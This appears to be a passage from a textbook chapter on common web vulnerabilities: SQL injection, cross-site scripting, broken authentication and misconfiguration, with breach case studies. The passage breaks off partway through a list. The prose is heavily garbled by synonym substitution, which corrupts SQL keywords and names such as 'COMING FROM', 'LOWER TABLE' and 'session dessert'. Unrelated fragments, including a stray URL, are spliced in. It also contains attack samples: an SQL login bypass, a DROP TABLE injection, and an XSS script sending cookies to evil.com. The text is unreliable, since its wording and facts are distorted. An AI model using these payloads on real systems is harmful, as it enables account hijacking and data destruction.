Risk Landscape and Standard Vulnerabilities

# Chapter some: Threat Landscape and even Common Vulnerabilities
Each application operates throughout an atmosphere full involving threats – malevolent actors constantly looking for weaknesses to exploit. Understanding the threat landscape is essential for defense. Throughout this chapter, we'll survey the nearly all common forms of app vulnerabilities and episodes seen in typically the wild today. We are going to discuss how these people work, provide actual samples of their exploitation, and introduce greatest practices to avoid all of them. This will lay the groundwork for later chapters, which may delve deeper in to how to construct security into the development lifecycle and specific defense.

Over the years, certain categories associated with vulnerabilities have surfaced as perennial problems, regularly appearing throughout security assessments plus breach reports. Business resources such as the OWASP Top 10 (for web applications) and even CWE Top 25 (common weaknesses enumeration) list these normal suspects. Let's explore some of typically the major ones:

## Injection Attacks (SQL, Command Injection, etc. )
- **Description**: Injection flaws take place when an application takes untrusted input (often from the user) and nourishes it into an interpreter or control in a manner that alters the intended execution. The classic example will be SQL Injection (SQLi) – where end user input is concatenated into an SQL query without proper sanitization, allowing you inject their own SQL commands. Similarly, Command word Injection involves inserting OS commands, LDAP Injection into LDAP queries, NoSQL Treatment in NoSQL data source, and so on. Essentially, the applying does not work out to distinguish info from code instructions.

- **How this works**: Consider some sort of simple login contact form that takes an username and password. If the server-side code naively constructs a query just like: `SELECT * COMING FROM users WHERE login = 'alice' PLUS password = 'mypassword'; `, an assailant can input a thing like `username: alice' OR '1'='1` plus `password: anything`. The cake you produced SQL would get: `SELECT * BY users WHERE login = 'alice' OR EVEN '1'='1' AND pass word = 'anything'; `. The `'1'='1'` problem always true can make the problem return all users, effectively bypassing the password check. This specific is a standard sort of SQL injection to force some sort of login.
More maliciously, an attacker can terminate the issue through adding `; LOWER TABLE users; --` to delete typically the users table (a destructive attack in integrity) or `; SELECT credit_card THROUGH users; --` to dump sensitive info (a confidentiality breach).
- **Real-world impact**: SQL injection has been behind a number of the largest data breaches on record. All of us mentioned the Heartland Payment Systems breach – in 2008, attackers exploited the SQL injection within a web application to be able to ultimately penetrate inside systems and grab millions of credit rating card numbers​
TWINGATE. COM
. Another situation: the TalkTalk 2015 breach in britain, where a teenager applied SQL injection to get into the personal info of over one hundred and fifty, 000 customers. The particular subsequent investigation unveiled TalkTalk had still left an obsolete website with an acknowledged SQLi flaw online, and hadn't patched a database susceptability from 2012​
ICO. ORG. UK
​
ICO. ORG. BRITISH
. TalkTalk's CEO described it as a new basic cyberattack; certainly, SQLi was well-understood for a ten years, yet the company's failure to sanitize inputs and up-date software led to the serious incident – they were fined and suffered reputational loss.
These good examples show injection episodes can compromise privacy (steal data), integrity (modify or delete data), and supply (if data will be wiped, service is disrupted). Even today, injection remains the common attack vector. In fact, OWASP's 2021 Top 10 still lists Injection (including SQL, NoSQL, command injection, and many others. ) being a best risk (category A03: 2021)​
IMPERVA. CONTENDO
.
- **Defense**: The primary defense towards injection is input validation and end result escaping – ensure that any untrusted files is treated as pure data, never ever as code. Applying prepared statements (parameterized queries) with destined variables is a gold standard with regard to SQL: it isolates the SQL program code through the data beliefs, so even in case an user enters a weird chain, it won't crack the query framework. For example, utilizing a parameterized query in Java with JDBC, the previous get access query would end up being `SELECT * BY users WHERE login name =? AND pass word =? `, and the `? ` placeholders are sure to user inputs safely (so `' OR PERHAPS '1'='1` would be treated literally while an username, which in turn won't match any real username, rather than part regarding SQL logic). Related approaches exist intended for other interpreters.
Upon top of that will, whitelisting input approval can restrict precisely what characters or format is allowed (e. g., an user name may be restricted in order to alphanumeric), stopping numerous injection payloads in the front door​
IMPERVA. COM
. In addition, encoding output correctly (e. g. HTML CODE encoding to stop script injection) is usually key, which we'll cover under XSS.
Developers should never ever directly include uncooked input in commands. Secure frameworks in addition to ORM (Object-Relational Mapping) tools help by handling the problem building for a person. Finally, least benefit helps mitigate impact: the database accounts used by typically the app should have got only necessary rights – e. g. it should not include DROP TABLE privileges if not required, to prevent a good injection from undertaking irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies a new class of vulnerabilities where an app includes malicious canevas in the context associated with a trusted internet site. Unlike injection straight into a server, XSS is about injecting in the content that other users see, usually in a web web page, causing victim users' browsers to carry out attacker-supplied script. Now there are a few types of XSS: Stored XSS (the malicious script is definitely stored on typically the server, e. grams. within a database, in addition to served to additional users), Reflected XSS (the script is usually reflected off of the server immediately within a reply, often with a research query or mistake message), and DOM-based XSS (the weeknesses is in client-side JavaScript that insecurely manipulates the DOM).

- **How this works**: Imagine a message board where consumers can post feedback. If the program is not going to sanitize HTML CODE tags in comments, an attacker can post a remark like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any end user who views that will comment will unintentionally run the software in their web browser. The script previously mentioned would send the particular user's session dessert to the attacker's server (stealing their particular session, hence allowing the attacker in order to impersonate them on the site – a confidentiality and even integrity breach).
In a reflected XSS situation, maybe the internet site shows your input with an error page: if you pass a new script in the particular URL as well as the web site echoes it, that will execute within the browser of whomever clicked that harmful link.
Essentially, XSS turns the victim's browser into a good unwitting accomplice.
- **Real-world impact**: XSS can be very serious, especially on highly trusted internet sites (like social networks, web mail, banking portals). A new famous early example was the Samy worm on Web sites in 2005. A user named Samy uncovered a stored XSS vulnerability in MySpace profiles.  https://docs.shiftleft.io/software-updates/2025-updates  designed a worm: the script that, whenever any user seen his profile, this would add your pet as a good friend and copy the script to typically the viewer's own user profile. This way, anyone more viewing their account got infected too. Within just thirty hours of discharge, over one zillion users' profiles had run the worm's payload, making Samy one of many fastest-spreading viruses of all time​
DURANTE. WIKIPEDIA. ORG
. The worm itself simply displayed the term "but most regarding all, Samy is my hero" in profiles, a fairly harmless prank​
EN. WIKIPEDIA. ORG
. However, it had been a wake-up call: if the XSS worm may add friends, this could just simply because easily make stolen private messages, spread spam, or done additional malicious actions in behalf of consumers. Samy faced legitimate consequences for this specific stunt​
EN. WIKIPEDIA. ORG
.
In an additional scenario, XSS may be used in order to hijack accounts: intended for instance, a resembled XSS in a bank's site might be used via a phishing email that techniques an user into clicking an WEB LINK, which then completes a script to transfer funds or perhaps steal session tokens.
XSS vulnerabilities have been found in web sites like Twitter, Fb (early days), and countless others – bug bounty applications commonly receive XSS reports. Although many XSS bugs are involving moderate severity (defaced UI, etc. ), some could be essential if they let administrative account takeover or deliver adware and spyware to users.
- **Defense**: The cornerstone of XSS security is output coding. Any user-supplied content material that is exhibited in a page have to be properly escaped/encoded so that this should not be interpreted as active script. With regard to example, in the event that a customer writes ` bad() ` in a comment, the server need to store it then output it since `< script> bad()< /script> ` and so that it appears as harmless text, not as the actual script. Modern day web frameworks frequently provide template search engines that automatically break free variables, which prevents most reflected or even stored XSS simply by default.
Another significant defense is Written content Security Policy (CSP) – a header that instructs internet browsers to execute intrigue from certain resources. A well-configured CSP can mitigate typically the impact of XSS by blocking in-line scripts or exterior scripts that aren't explicitly allowed, although CSP could be intricate to set finished without affecting site functionality.
For builders, it's also critical to prevent practices love dynamically constructing HTML with raw information or using `eval()` on user input in JavaScript. Web applications can furthermore sanitize input to strip out disallowed tags or attributes (though this really is difficult to get perfect). In summary: confirm and sanitize any HTML or JavaScript inputs, use context-appropriate escaping (HTML break free for HTML articles, JavaScript escape for data injected into scripts, etc. ), and consider permitting browser-side defenses want CSP.

## Broken Authentication and Period Supervision
- **Description**: These vulnerabilities include weaknesses in how users authenticate to be able to the application or maintain their verified session. "Broken authentication" can mean many different issues: allowing poor passwords, not protecting against brute force, screwing up to implement proper multi-factor authentication, or perhaps exposing session IDs. "Session management" is definitely closely related – once an end user is logged in, the app usually uses a program cookie or symbol to consider them; in case that mechanism is certainly flawed (e. h. predictable session IDs, not expiring periods, not securing the cookie), attackers may hijack other users' sessions.

- **How it works**: Single common example is definitely websites that imposed overly simple password requirements or had no protection towards trying many passwords. Attackers exploit this particular by using credential stuffing (trying username/password pairs leaked from the other sites) or incredible force (trying several combinations). If there are not any lockouts or even rate limits, the attacker can methodically guess credentials.
One other example: if an application's session sandwich (the item of information that identifies a new logged-in session) will be not marked together with the Secure flag (so it's sent more than HTTP as properly as HTTPS) or not marked HttpOnly (so it can be accessible in order to scripts), it could be thieved via network sniffing or XSS. As soon as an attacker offers a valid program token (say, taken from an unconfident Wi-Fi or through an XSS attack), they could impersonate of which user without requiring credentials.
There include also been common sense flaws where, with regard to instance, the pass word reset functionality is usually weak – maybe it's vulnerable to the attack where a great attacker can reset someone else's security password by modifying guidelines (this crosses in to insecure direct subject references / gain access to control too).
General, broken authentication addresses anything that permits an attacker to be able to either gain credentials illicitly or avoid the login using some flaw.
- **Real-world impact**: We've all seen information of massive "credential dumps" – billions of username/password pairs floating around through past breaches. Attackers take these in addition to try them about other services (because many people reuse passwords). This automated abilities stuffing has directed to compromises of high-profile accounts on the subject of various platforms.
Among the broken auth was your case in 2012 where LinkedIn experienced a breach in addition to 6. 5 million password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. CONTENDO
​
NEWS. SOPHOS. APRESENTANDO
. The poor hashing meant assailants cracked most regarding those passwords within hours​
NEWS. SOPHOS. COM
​
REPORTS. SOPHOS. COM
. Worse, a few many years later it turned out the breach was actually a lot larger (over a hundred million accounts). Individuals often reuse security passwords, so that break had ripple effects across other web sites. LinkedIn's failing was initially in cryptography (they didn't salt or perhaps use a robust hash), which is part of protecting authentication data.
Another common incident type: program hijacking. For occasion, before most sites adopted HTTPS almost everywhere, attackers on the same network (like an open Wi-Fi) could sniff snacks and impersonate consumers – a threat popularized from the Firesheep tool this season, which in turn let anyone bug on unencrypted periods for sites like Facebook. This made web services in order to encrypt entire classes, not just get access pages.
There are also cases of flawed multi-factor authentication implementations or login bypasses due to logic errors (e. grams., an API that returns different text messages for valid as opposed to invalid usernames can allow an assailant to enumerate consumers, or possibly a poorly executed "remember me" symbol that's easy to be able to forge). The effects involving broken authentication are severe: unauthorized access to user balances, data breaches, id theft, or unauthorized transactions.
- **Defense**: Protecting authentication requires a multi-pronged approach:
- Enforce strong password policies but within reason. Current NIST guidelines recommend letting users to select long passwords (up to 64 chars) and never requiring regular changes unless there's indication of compromise​
JUMPCLOUD. COM
​
AUDITBOARD. COM
. Rather, check passwords towards known breached username and password lists (to disallow "P@ssw0rd" and typically the like). Also inspire passphrases that happen to be much easier to remember yet hard to think.
- Implement multi-factor authentication (MFA). The password alone is often not enough these kinds of days; providing an alternative (or requirement) for the second factor, like an one-time code or possibly a push notification, considerably reduces the chance of account compromise even if security passwords leak. Many major breaches could have got been mitigated by simply MFA.
- Safe the session tokens. Use the Safeguarded flag on biscuits so they will be only sent above HTTPS, HttpOnly thus they aren't available via JavaScript (mitigating some XSS impact), and consider SameSite to prevent these people from being delivered in CSRF assaults (more on CSRF later). Make period IDs long, arbitrary, and unpredictable (to prevent guessing).
-- Avoid exposing program IDs in URLs, because they may be logged or released via referer headers. Always prefer biscuits or authorization headers.
- Implement account lockout or throttling for login attempts. After say  severity critical  to ten failed attempts, both lock the are the cause of a period or increasingly delay reactions. Also use CAPTCHAs or even other mechanisms in case automated attempts are detected. However, end up being mindful of denial-of-service – some sites opt for smoother throttling to steer clear of letting attackers fasten out users by trying bad security passwords repeatedly.
- Treatment timeout and logout: Expire sessions following a reasonable period involving inactivity, and totally invalidate session bridal party on logout. It's surprising how several apps in the particular past didn't correctly invalidate server-side period records on logout, allowing tokens to become re-used.
- Look closely at forgot password goes. Use secure bridal party or links via email, don't reveal whether an user exists or certainly not (to prevent end user enumeration), and guarantee those tokens run out quickly.
Modern frames often handle the lot of this kind of for yourself, but misconfigurations are common (e. h., a developer may well accidentally disable some sort of security feature). Normal audits and assessments (like using OWASP ZAP or additional tools) can capture issues like lacking secure flags or weak password guidelines.
Lastly, monitor authentication events. Unusual habits (like a single IP trying 1000s of email usernames, or one account experiencing a huge selection of hit a brick wall logins) should lift alarms. This overlaps with intrusion diagnosis.
To emphasize, OWASP's 2021 list cell phone calls this category Recognition and Authentication Failures (formerly "Broken Authentication") and highlights the importance of items like MFA, not making use of default credentials, and implementing proper password handling​
IMPERVA. COM
. They note that will 90% of apps tested had concerns in this area in several form, which is quite mind boggling.

## Security Misconfiguration
- **Description**: Misconfiguration isn't just one weakness per se, but a broad class of mistakes throughout configuring the software or its surroundings that lead to be able to insecurity. This can involve using default credentials or configurations, leaving unnecessary attributes enabled, misconfiguring protection headers, or not hardening the server. Basically, the software may be secure in theory, nevertheless the way it's deployed or designed opens a gap.

- **How it works**: Examples regarding misconfiguration:
- Causing default admin accounts/passwords active. Many software packages or equipment historically shipped with well-known defaults